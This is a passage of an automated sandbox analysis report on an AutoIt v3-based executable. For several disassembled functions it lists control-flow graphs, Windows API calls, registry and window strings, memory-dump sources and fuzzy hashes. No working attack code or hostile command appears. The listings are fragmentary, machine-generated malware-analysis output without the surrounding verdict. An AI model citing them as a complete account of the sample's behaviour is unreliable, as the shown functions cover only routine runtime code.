e308f6-e308fa 356->359 360 e3097b 356->360 358->356 359->360 361 e308fc-e3092f CloseHandle call e3039a 359->361 360->322 364 e30963-e30977 361->364 365 e30931-e3095d GetLastError call e1f2a3 call e25333 361->365 364->360 365->364
                                                        APIs
                                                          • Part of subcall function 00E3039A: CreateFileW.KERNELBASE(00000000,00000000,?,00E30704,?,?,00000000,?,00E30704,00000000,0000000C), ref: 00E303B7
                                                        • GetLastError.KERNEL32 ref: 00E3076F
                                                        • __dosmaperr.LIBCMT ref: 00E30776
                                                        • GetFileType.KERNELBASE(00000000), ref: 00E30782
                                                        • GetLastError.KERNEL32 ref: 00E3078C
                                                        • __dosmaperr.LIBCMT ref: 00E30795
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E307B5
                                                        • CloseHandle.KERNEL32(?), ref: 00E308FF
                                                        • GetLastError.KERNEL32 ref: 00E30931
                                                        • __dosmaperr.LIBCMT ref: 00E30938
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID: H
                                                        • API String ID: 4237864984-2852464175
                                                        • Opcode ID: 699b9fc8867d9fe3ad9161ce0333b9a853d0f5401219b43f530d27406d82ea37
                                                        • Instruction ID: af0ca494e93cb68c1d0e97f66492c7f7ebdffe60f9d068af328c9c977e36e127
                                                        • Opcode Fuzzy Hash: 699b9fc8867d9fe3ad9161ce0333b9a853d0f5401219b43f530d27406d82ea37
                                                        • Instruction Fuzzy Hash: 93A12532A001488FDF19EF68D866BAE7FE0AB46324F14115EF815BB3A1C7319857CB91
                                                        Function 00DF344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00DF3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EC1418,?,00DF2E7F,?,?,?,00000000), ref: 00DF3A78
                                                          • Part of subcall function 00DF3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DF3379
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DF356A
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E3318D
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E331CE
                                                        • RegCloseKey.ADVAPI32(?), ref: 00E33210
                                                        • _wcslen.LIBCMT ref: 00E33277
                                                        • _wcslen.LIBCMT ref: 00E33286
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 98802146-2727554177
                                                        • Opcode ID: 0ae517446ec599b9706441f3eab8a4aafbb4c0b7a8e4b4f6c740aeddd5c38768
                                                        • Instruction ID: bb48332cd2df069e143412ed9edd2cbdb14f82e4f416da72351e7c6a3d5318af
                                                        • Opcode Fuzzy Hash: 0ae517446ec599b9706441f3eab8a4aafbb4c0b7a8e4b4f6c740aeddd5c38768
                                                        • Instruction Fuzzy Hash: AA71A0714043469EC304EF6ADC41DABBBE8FF85340F41553EF649A31A0DB369A49CB61
                                                        Function 00DF2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00DF2B8E
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00DF2B9D
                                                        • LoadIconW.USER32(00000063), ref: 00DF2BB3
                                                        • LoadIconW.USER32(000000A4), ref: 00DF2BC5
                                                        • LoadIconW.USER32(000000A2), ref: 00DF2BD7
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DF2BEF
                                                        • RegisterClassExW.USER32(?), ref: 00DF2C40
                                                          • Part of subcall function 00DF2CD4: GetSysColorBrush.USER32(0000000F), ref: 00DF2D07
                                                          • Part of subcall function 00DF2CD4: RegisterClassExW.USER32(00000030), ref: 00DF2D31
                                                          • Part of subcall function 00DF2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF2D42
                                                          • Part of subcall function 00DF2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00DF2D5F
                                                          • Part of subcall function 00DF2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DF2D6F
                                                          • Part of subcall function 00DF2CD4: LoadIconW.USER32(000000A9), ref: 00DF2D85
                                                          • Part of subcall function 00DF2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DF2D94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 852ff1f087424cc10d009a70e13c09a78d801d08ebefc85315ce2bf9e92e97ce
                                                        • Instruction ID: 3f205e4f802853d2fed74f222588172cb015498e9273ae69b8dfbff47ce5c5d3
                                                        • Opcode Fuzzy Hash: 852ff1f087424cc10d009a70e13c09a78d801d08ebefc85315ce2bf9e92e97ce
                                                        • Instruction Fuzzy Hash: C3217170D00354AFDB109FABEC45FA97FB4FB49B44F1100AAE504B2661D3B64519CF90
                                                        Function 00DF3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 443 df3170-df3185 444 df3187-df318a 443->444 445 df31e5-df31e7 443->445 446 df318c-df3193 444->446 447 df31eb 444->447 445->444 448 df31e9 445->448 449 df3199-df319e 446->449 450 df3265-df326d PostQuitMessage 446->450 452 e32dfb-e32e23 call df18e2 call e0e499 447->452 453 df31f1-df31f6 447->453 451 df31d0-df31d8 DefWindowProcW 448->451 455 df31a4-df31a8 449->455 456 e32e7c-e32e90 call e5bf30 449->456 458 df3219-df321b 450->458 457 df31de-df31e4 451->457 487 e32e28-e32e2f 452->487 459 df321d-df3244 SetTimer RegisterWindowMessageW 453->459 460 df31f8-df31fb 453->460 462 df31ae-df31b3 455->462 463 e32e68-e32e72 call e5c161 455->463 456->458 480 e32e96 456->480 458->457 459->458 464 df3246-df3251 CreatePopupMenu 459->464 466 df3201-df3214 KillTimer call df30f2 call df3c50 460->466 467 e32d9c-e32d9f 460->467 470 df31b9-df31be 462->470 471 e32e4d-e32e54 462->471 476 e32e77 463->476 464->458 466->458 473 e32da1-e32da5 467->473 474 e32dd7-e32df6 MoveWindow 467->474 478 df31c4-df31ca 470->478 479 df3253-df3263 call df326f 470->479 471->451 483 e32e5a-e32e63 call e50ad7 471->483 481 e32da7-e32daa 473->481 482 e32dc6-e32dd2 SetFocus 473->482 474->458 476->458 478->451 478->487 479->458 480->451 481->478 488 e32db0-e32dc1 call df18e2 481->488 482->458 483->451 487->451 491 e32e35-e32e48 call df30f2 call df3837 487->491 488->458 491->451
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00DF316A,?,?), ref: 00DF31D8
                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00DF316A,?,?), ref: 00DF3204
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DF3227
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00DF316A,?,?), ref: 00DF3232
                                                        • CreatePopupMenu.USER32 ref: 00DF3246
                                                        • PostQuitMessage.USER32(00000000), ref: 00DF3267
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: 7c7527a314a3d12b9931d361d5980ea8b4dcb97cf4b054b26317051eeab60e50
                                                        • Instruction ID: 8407f5b17f5542b399db843f3b9e9e66e2b5d3b2ffd28d8b358775976a0e3e42
                                                        • Opcode Fuzzy Hash: 7c7527a314a3d12b9931d361d5980ea8b4dcb97cf4b054b26317051eeab60e50
                                                        • Instruction Fuzzy Hash: 3E413731200308AFDB142B799D0EF793A54E746348F1B912AFB4AB5292CB73CA458775
                                                        Function 00DF2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 509 df2c63-df2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DF2C91
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DF2CB2
                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DF1CAD,?), ref: 00DF2CC6
                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DF1CAD,?), ref: 00DF2CCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 2e4477c0989a54bbdc9576bdce6385510de02bf50ec5f009b3e120a9ed4f5724
                                                        • Instruction ID: 098f839bc6e5b4528764e578b1b8d1b39a980ad1316721bde71b938c15f255fa
                                                        • Opcode Fuzzy Hash: 2e4477c0989a54bbdc9576bdce6385510de02bf50ec5f009b3e120a9ed4f5724
                                                        • Instruction Fuzzy Hash: E5F03A755403D07EEB30172BAC08E7B2EBDD7C7F54B1200AAF908B25A1C272085ADAB0
                                                        Function 00E5E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 898 e5e97b-e5e986 899 e5e9f9-e5e9fb 898->899 900 e5e988 898->900 901 e5e98e-e5e991 900->901 902 e5e98a-e5e98c 900->902 904 e5e993-e5e99f QueryPerformanceCounter 901->904 905 e5e9f2 901->905 903 e5e9f3 Sleep 902->903 903->899 904->905 906 e5e9a1-e5e9a5 QueryPerformanceFrequency 904->906 905->903 907 e5e9ab-e5e9ee Sleep QueryPerformanceCounter call e320b0 906->907 910 e5e9f0 907->910 910->899
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00E5E997
                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 00E5E9A5
                                                        • Sleep.KERNEL32(00000000), ref: 00E5E9AD
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00E5E9B7
                                                        • Sleep.KERNELBASE ref: 00E5E9F3
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 8fff2400b6cd956f63cb22acc1138bdad5e42bdb2cb463b7540f0c4492721090
                                                        • Instruction ID: abb4d9e5a4fa2123b644d7030568950c5bf936ac1ab350a6d95c14dd864fbd91
                                                        • Opcode Fuzzy Hash: 8fff2400b6cd956f63cb22acc1138bdad5e42bdb2cb463b7540f0c4492721090
                                                        • Instruction Fuzzy Hash: CD016D31C01529DBCF089FE5DC9D6DDBB78FF49302F101986E912B2250DB309658CBA1
                                                        Function 00DF3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 947 df3b1c-df3b27 948 df3b99-df3b9b 947->948 949 df3b29-df3b2e 947->949 950 df3b8c-df3b8f 948->950 949->948 951 df3b30-df3b48 RegOpenKeyExW 949->951 951->948 952 df3b4a-df3b69 RegQueryValueExW 951->952 953 df3b6b-df3b76 952->953 954 df3b80-df3b8b RegCloseKey 952->954 955 df3b78-df3b7a 953->955 956 df3b90-df3b97 953->956 954->950 957 df3b7e 955->957 956->957 957->954
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00DF3B0F,SwapMouseButtons,00000004,?), ref: 00DF3B40
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00DF3B0F,SwapMouseButtons,00000004,?), ref: 00DF3B61
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00DF3B0F,SwapMouseButtons,00000004,?), ref: 00DF3B83
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 0b51f31789c995222f2d2cc01e0a546fd6279b63de073d5f8d77440421e61da3
                                                        • Instruction ID: a84c08af008d712f10e3d3b1ac1057dd614098d0157036b32188920d71bccf8f
                                                        • Opcode Fuzzy Hash: 0b51f31789c995222f2d2cc01e0a546fd6279b63de073d5f8d77440421e61da3
                                                        • Instruction Fuzzy Hash: C4112AB5511208FFDB218FA5DC54ABEB7B8EF05784B16845AA905E7110D231DE449770
                                                        Function 00DF3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E333A2
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DF3A04
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                        • String ID: Line:
                                                        • API String ID: 2289894680-1585850449
                                                        • Opcode ID: 9072cdc5704af09cb9634192146fbd3787a77ed7c89ea28f9679db4e3ce14d11
                                                        • Instruction ID: a9550bbb4c9bccafeda956f334d66d035c4627c3e9bdb3cdc925fdc1b6a441cd
                                                        • Opcode Fuzzy Hash: 9072cdc5704af09cb9634192146fbd3787a77ed7c89ea28f9679db4e3ce14d11
                                                        • Instruction Fuzzy Hash: CD31E8714083486EC321EB24DC45FFF77D8AF41754F12856AF699A2091DB709649CBF2
                                                        Function 00DF2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 994 df2de3-df2e03 call e31f50 997 df2e09-df2e2c call df3aa2 call df2da5 call df3598 call df44a8 994->997 998 e32c2b-e32c94 call e12340 GetOpenFileNameW 994->998 1012 df2e31-df2e34 997->1012 1004 e32c96 998->1004 1005 e32c9d-e32ca6 call df6b57 998->1005 1004->1005 1009 e32cab 1005->1009 1009->1009
                                                        APIs
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00E32C8C
                                                          • Part of subcall function 00DF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF3A97,?,?,00DF2E7F,?,?,?,00000000), ref: 00DF3AC2
                                                          • Part of subcall function 00DF2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DF2DC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen
                                                        • String ID: X$`e
                                                        • API String ID: 779396738-4036142377
                                                        • Opcode ID: d1fd62ac99a2652c8feaaace84033523b41e52cdd0c3b344cfff1257d598c045
                                                        • Instruction ID: 01c85bd313ce37e0f6f020d5b05545b28c8f07736f0ba0f7d961ab55f5217798
                                                        • Opcode Fuzzy Hash: d1fd62ac99a2652c8feaaace84033523b41e52cdd0c3b344cfff1257d598c045
                                                        • Instruction Fuzzy Hash: 44219671A0029C9FCB01DF94C845BEE7BF8AF49304F118059E545BB241DBB89A89CF71
                                                        Function 00E0FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1013 e0fddb-e0fdde 1014 e0fded-e0fdf0 call e1ea0c 1013->1014 1016 e0fdf5-e0fdf8 1014->1016 1017 e0fde0-e0fdeb call e14ead 1016->1017 1018 e0fdfa-e0fdfb 1016->1018 1017->1014 1021 e0fdfc-e0fe00 1017->1021 1022 e0fe06-e1066d call e1059c call e132a4 1021->1022 1023 e1066e-e10690 call e105cf call e132a4 1021->1023 1022->1023 1032 e10692 1023->1032 1033 e10697 1023->1033 1032->1033
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00E10668
                                                          • Part of subcall function 00E132A4: RaiseException.KERNEL32(?,?,?,00E1068A,?,00EC1444,?,?,?,?,?,?,00E1068A,00DF1129,00EB8738,00DF1129), ref: 00E13304
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00E10685
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                        • String ID: Unknown exception
                                                        • API String ID: 3476068407-410509341
                                                        • Opcode ID: 6eaca0544f341593d78d2926230a792c3185a5a653bed1fdedcdb2ac7c76c146
                                                        • Instruction ID: f7065b29007c62014ad0ef6b8fa0a6c737f12b89b32e9f0685b9424800dcdd7e
                                                        • Opcode Fuzzy Hash: 6eaca0544f341593d78d2926230a792c3185a5a653bed1fdedcdb2ac7c76c146
                                                        • Instruction Fuzzy Hash: E0F0C23490030DB7CB10B674D846DDE77AD5E40354B606131F928F6AE5EFB1DAE6C680
                                                        Function 00DF10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DF1BF4
                                                          • Part of subcall function 00DF1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DF1BFC
                                                          • Part of subcall function 00DF1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DF1C07
                                                          • Part of subcall function 00DF1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DF1C12
                                                          • Part of subcall function 00DF1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DF1C1A
                                                          • Part of subcall function 00DF1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DF1C22
                                                          • Part of subcall function 00DF1B4A: RegisterWindowMessageW.USER32(00000004,?,00DF12C4), ref: 00DF1BA2
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DF136A
                                                        • OleInitialize.OLE32 ref: 00DF1388
                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 00E324AB
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: 70ab79de60606d025672f8ffb79909f0109710195e7655faba8a61098e3d70d2
                                                        • Instruction ID: 889320259ff59c8a08a7808695a764d6fd95944648cb4d11921aa6b46fd80bd8
                                                        • Opcode Fuzzy Hash: 70ab79de60606d025672f8ffb79909f0109710195e7655faba8a61098e3d70d2
                                                        • Instruction Fuzzy Hash: 5F71A2B59052448E8388EF7AA945E653AE0FB8B34035591BED11AF7363E732841B8F61
                                                        Function 00E5C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DF3A04
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E5C259
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00E5C261
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E5C270
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
